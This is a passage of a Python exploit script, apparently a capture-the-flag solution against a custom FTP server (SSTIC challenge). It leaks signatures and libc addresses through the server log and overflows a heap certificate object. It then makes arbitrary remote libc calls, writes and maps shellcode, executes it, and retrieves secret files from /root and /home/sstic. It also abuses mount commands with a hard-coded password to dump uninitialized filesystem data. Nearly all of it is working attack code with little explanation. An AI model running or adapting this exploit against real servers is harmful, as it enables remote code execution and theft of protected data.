    remoteCall(ftp, g_libc_memset_address, [0x33333004, 0x0, 0x1001], sig2)

    # Gen a fake goodfs directory
    remoteWrite(ftp, 0x33333004 + 0x24 * 0, b'\x03')
    remoteWrite(ftp, 0x33333004 + 0x24 * 0 + 4, b'inode3')
    remoteWrite(ftp, 0x33333004 + 0x24 * 1, b'\x04')
    remoteWrite(ftp, 0x33333004 + 0x24 * 1 + 4, b'inode4')
    remoteWrite(ftp, 0x33333004 + 0x24 * 2, b'\x05')
    remoteWrite(ftp, 0x33333004 + 0x24 * 2 + 4, b'inode5')
    remoteWrite(ftp, 0x33333004 + 0x24 * 3, b'\x06')
    remoteWrite(ftp, 0x33333004 + 0x24 * 3 + 4, b'inode6')

    # Gen a utimbuf struct for utime system call
    remoteWrite(ftp, 0x33333504, b'\x77\x77\x77\x77')
    remoteWrite(ftp, 0x33333504+4, b'\x77\x77\x77\x77')
    remoteWrite(ftp, 0x33333504+8, b'\x77\x77\x77\x77')

    # remoteWrite(ftp, 0x33333004, b'touch /home/sstic/toto ;')

    # Prepare umount
    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'umount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')

    global g_umount_trigger

    infd = 8
    for i in range(0, 5) :

        if infd == 10 :
            # \x0a cannot be written with the remote write...
            # Skip this file descriptor
            remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
            remoteWrite(ftp, arg1Address, b'/home/sstic/secret.txt')
            remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR, 0x1A4], sig2)
            remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
            infd += 1
            continue



        remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
        # remoteWrite(ftp, arg1Address, b'/mnt/goodfs/public/')
        # remoteWrite(ftp, arg1Address, b'/dev/ttyS0')
        # remoteWrite(ftp, arg1Address, b'/mnt/goodfs/public/newd4/newf' + bytes(str(i), encoding = 'utf8'))
        # input(hex(g_libcBaseAddress + g_libc_open_offset))

        # mkdir
        remoteWrite(ftp, arg1Address, b'/mnt/goodfs/public/newd' + bytes(str(i), encoding = 'utf8'))
        remoteCall(ftp, g_libcBaseAddress + g_libc_mkdir_offset, [arg1Address, 0x1A4 | int('700', 8)], sig2)
        remoteCall(ftp, g_libcBaseAddress + g_libc_utime_offset, [arg1Address, 0x33333504], sig2)

        remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)

        if i == 4 :
            break

        for j in range(31) :
            print( i * 32 + j)
            
            # remoteWrite(ftp, arg1Address, '/mnt/goodfs/public/newd{}/newf{}'.format(i, j).encode('utf8'))
            # remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_CREAT, 0x1A4], sig2)
            # remoteCall(ftp, g_libcBaseAddress + g_libc_write_offset, [infd, 0x33333004, 0x501], sig2)
            # g_umount_trigger = 1
            # remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [infd], sig2)
            # g_umount_trigger = 0

            remoteWrite(ftp, arg1Address, '/mnt/goodfs/public/newd{}/newdd{}'.format(i, j).encode('utf8'))
            remoteCall(ftp, g_libcBaseAddress + g_libc_mkdir_offset, [arg1Address, 0x1A4 | int('700', 8)], sig2, getLogged = False, cleanup = False)

        remoteWrite(ftp, arg1Address, '/mnt/goodfs/public/newd{}/newdd{}'.format(i, 31).encode('utf8'))
        remoteCall(ftp, g_libcBaseAddress + g_libc_mkdir_offset, [arg1Address, 0x1A4 | int('700', 8)], sig2)



        # infd += 1

    # print('close')
    # for i in range(20) :
    #     infd -= 1
    #     if infd == 10 : continue
    #     remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [infd], sig2)

    # remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    # remoteWrite(ftp, 0x44444000 + 0x104, b'umount')
    # remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    # remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    # time.sleep(2)

    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'mount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    # Prepare umount
    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'umount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')


    # Create file with directory data
    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    remoteWrite(ftp, arg1Address, '/mnt/goodfs/public/newd4/finalfile'.encode('utf8'))
    remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_CREAT, 0x1A4], sig2)
    remoteCall(ftp, g_libcBaseAddress + g_libc_write_offset, [infd, 0x33333004, 0x501], sig2)
    g_umount_trigger = 1
    remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [infd], sig2)
    g_umount_trigger = 0

    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'mount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    # time.sleep(2)

    # Prepare umount
    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'umount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')

    # Create directory which will take uninitialized data from file
    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    remoteWrite(ftp, arg1Address, '/mnt/goodfs/public/newd4/finaldir'.encode('utf8'))
    g_umount_trigger = 1
    remoteCall(ftp, g_libcBaseAddress + g_libc_mkdir_offset, [arg1Address, 0x1A4 | int('700', 8)], sig2)
    g_umount_trigger = 0

    # umount
    remoteWrite(ftp, 0x44444000, b'\x01')

    # time.sleep(2)

    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'mount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

    # time.sleep(2)

    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    remoteWrite(ftp, arg1Address, b'/home/sstic')
    remoteCall(ftp, g_libcBaseAddress + g_libc_chdir_offset, [arg1Address], sig2, getLogged = True)

    # File dumping
    name = b'/mnt/goodfs/public/newd4/finaldir/inode3'
    while len(name) > 0 :
        remoteCall(ftp, g_libc_memset_address, [0x33333004, 0x0, 0x1001], sig2)
        remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
        remoteWrite(ftp, arg1Address, name)
        remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_READONLY, 0x1A4], sig2)
        outfd = infd
        remoteCall(ftp, g_libcBaseAddress + g_libc_read_offset, [outfd, 0x33333004, 0x1001], sig2)
        remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [outfd], sig2)

        # Dump
        remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
        remoteWrite(ftp, arg1Address, b'dump.bin')
        remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_CREAT|O_TRUNC, 0x1A4], sig2)
        outfd = infd
        remoteCall(ftp, g_libcBaseAddress + g_libc_write_offset, [outfd, 0x33333004, 0x1001], sig2)
        remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [outfd], sig2)

        # data = sendCmd(ftp, 'LIST', '')
        # print('/home/sstic\n', data.decode('utf-8'))

        data = sendCmd(ftp, 'RETR', 'dump.bin')
        print('{}\n'.format(name), data.rstrip(b'\x00'))

        with open(name.decode('utf-8').replace('/', '_') + '.bin', 'wb') as f :
            f.write(data)

        name = input('file to get ? ')
        name = bytes(name, encoding = 'utf8')

    sendCmdSimple(ftp, 'QUIT')

def umount(ftp, sig2) :
    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'umount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

def mounterServerComm(ftp, sig2, cmdPayload, argPayload, pwd = b'MGhtT34gHj5yFcszRYB4gf45DtymEi') :
    remoteWrite(ftp, 0x44444000 + 0x104, b'umount')
    if cmdPayload :
        remoteWrite(ftp, 0x44444000 + 0x104 + len(b'umount') + 1, cmdPayload)

    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    if argPayload :
        remoteWrite(ftp, 0x44444000 + 0x104 + len(b'goodfs') + 1, argPayload)

    if pwd : remoteWrite(ftp, 0x44444000 + 0x004, pwd)
    
    remoteWrite(ftp, 0x44444000, b'\x01')

def mount(ftp, sig2) :
    remoteCall(ftp, g_libc_memset_address, [0x44444000 + 0x4, 0x0, 0x304], sig2)
    remoteWrite(ftp, 0x44444000 + 0x104, b'mount')
    remoteWrite(ftp, 0x44444000 + 0x204, b'goodfs')
    remoteWrite(ftp, 0x44444000 + 0x004, b'MGhtT34gHj5yFcszRYB4gf45DtymEi')
    remoteWrite(ftp, 0x44444000, b'\x01')

def step6(ftp) :
    print(ftp.getwelcome())

    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'X'*(0x30-1), wrongSig=1)))

    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    sendCmdSimple(ftp, 'DBG')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig1=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')

    sendCmdSimple(ftp, 'USER anonymous')
    sendCmdSimple(ftp, 'PASS anonymous')
    sendCmdSimple(ftp, 'USER aaaaaaaaaaaasig2=')
    sendCmdSimple(ftp, 'USER anon')
    sendCmdSimple(ftp, 'PASS anon')
    data = sendCmd(ftp, 'RETR', 'ftp.log')

    pattern = b'User aaaaaaaaaaaasig1'
    offset = data.find(pattern)
    sig1 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    pattern = b'User aaaaaaaaaaaasig2'
    offset = data.find(pattern)
    sig2 = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0]

    computeSigUserSigned = struct.unpack('<Q', data[offset+len(pattern)+8:offset+len(pattern)+16])[0]
    global g_binaryBaseAddress
    g_binaryBaseAddress = (computeSigUserSigned - g_computeSigUser_offset) & 0xffffffffffff
    print('Binary base address ', hex(g_binaryBaseAddress))

    setHsmKeys(sig1, sig2, computeSigUserSigned)

    # Alloc a buffer for the new username, Free 0x30 ftpuser and alloc 0x30 ftpcert
    sendCmdSimple(ftp, 'CERT {}'.format(craftCert(user = b'&user=' + b'A'*(0x30-1) + b'&user=' + b'B'*(0x30-1) + b'&user=' + b'C'*(0x30-1))))

    data = b''
    data += b'D' * 0x208
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)
    # Overwrite username to point to getenv address and leak it
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_got_getenv_offset)
    # Overflow ftpcert object
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    # Overflow ftpcert object to restore a proper name and get logged
    data = b''
    while len(data) < 0x208 :
        data += b'D'
    # Heap metadata for ftpcert chunk (size + flags)
    data += struct.pack('<Q', 0x41)
    data += craftFtpCertObject(usernameAddress = g_binaryBaseAddress + g_anonymousString_offset, usernameSig = sig2)
    sendCmdSimple(ftp, 'CERT {}'.format(base64.b64encode(data).decode('utf-8')))

    data = sendCmd(ftp, 'RETR', 'ftp.log')
    # print(data)

    pattern = b'530 Invalid cert\nUser '
    offset = data.find(pattern)

    global g_libc_getenv_address
    g_libc_getenv_address = struct.unpack('<Q', data[offset+len(pattern):offset+len(pattern)+8])[0] & 0xffffffffffff
    print('lib getenv address', hex(g_libc_getenv_address))

    resolveAddresses()

    arg1Address = g_libc_rwzone_address+0x218

    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    remoteWrite(ftp, arg1Address, b'/run/mount_shm')
    # remoteWrite(ftp, arg1Address, b'/tmp/test')
    remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, 2, 438], sig2)
    remoteCall(ftp, g_libcBaseAddress + g_libc_mmap_offset, [0x44444444, 0x4444, 3, 1, 7, 0], sig2)
    mount(ftp, sig2)

    # mmap
    PROT_READ = 1
    PROT_WRITE = 2
    PROT_EXEC = 4
    MAP_PRIVATE = 2
    MAP_ANONYMOUS = 0x20
    remoteCall(ftp, g_libcBaseAddress + g_libc_mmap_offset, [0x33333001, 0x2001, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0xffffffff, 0], sig2)

    # Read

    O_READONLY = 0
    O_WRONLY = 0x1
    O_RDWR = 2
    O_CREAT = 0x40
    O_TRUNC = 0x200
    O_DIRECTORY = 0x010000
    O_TMPFILE = 0x410000
    O_DIRECT = 0x4000
    O_DSYNC = 0x1000

    remoteCall(ftp, g_libc_memset_address, [0x33333004, 0x0, 0x2001], sig2)
    with open('shellcode.bin', 'rb') as f :
        remoteWriteHandleZero(ftp, 0x33333004, f.read())

    infd = 8

    # Create file with shellcode
    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    remoteWrite(ftp, arg1Address, '/home/sstic/shellcode.bin'.encode('utf8'))
    # remoteWrite(ftp, arg1Address, '/home/user/sstic/step2/initramfs/home/sstic/shellcode.bin'.encode('utf8'))
    remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_CREAT, 0x1A4], sig2)
    remoteCall(ftp, g_libcBaseAddress + g_libc_write_offset, [infd, 0x33333004, 0x2001], sig2)
    remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [infd], sig2)

    remoteCall(ftp, g_libcBaseAddress + g_libc_open_offset, [arg1Address, O_RDWR|O_CREAT, 0x1A4], sig2)
    remoteCall(ftp, g_libcBaseAddress + g_libc_mmap_offset, [0x55555001, 0x2001, PROT_READ|PROT_EXEC, MAP_PRIVATE, infd, 0], sig2)
    remoteCall(ftp, g_libcBaseAddress + g_libc_close_offset, [infd], sig2)

    # Call shellcode
    print('call shellcode')
    remoteCall(ftp, 0x55555001, [g_libcBaseAddress+1, 0x44444444], sig2)

    remoteCall(ftp, g_libc_memset_address, [arg1Address, 0, 0x38], sig2)
    remoteWrite(ftp, arg1Address, b'/root')
    remoteCall(ftp, g_libcBaseAddress + g_libc_chdir_offset, [arg1Address], sig2, getLogged = True)

    data = sendCmd(ftp, 'RETR', 'final_secret.txt')
    print('final_secret.txt\n', data.rstrip(b'\x00'))

    with open('final_secret.txt', 'wb') as f :
        f.write(data)

    data = sendCmd(ftp, 'LIST', '')
    print(data.decode('utf-8'))

    sendCmdSimple(ftp, 'QUIT')

    return

def main() :
    args = parseArgs()

    ftp = ftplib.FTP()
    ftp.connect(args.ip, args.port, timeout = 60)
    # step5(ftp)
    # step5LeakUnusedSectors(ftp)
    # sensitive(ftp)
    # leakSigAndGetSecret(ftp)
    step6(ftp)


if __name__ == '__main__' :
    logging.basicConfig(format = '[%(asctime)s %(name)s %(levelname)s] %(message)s')
    main()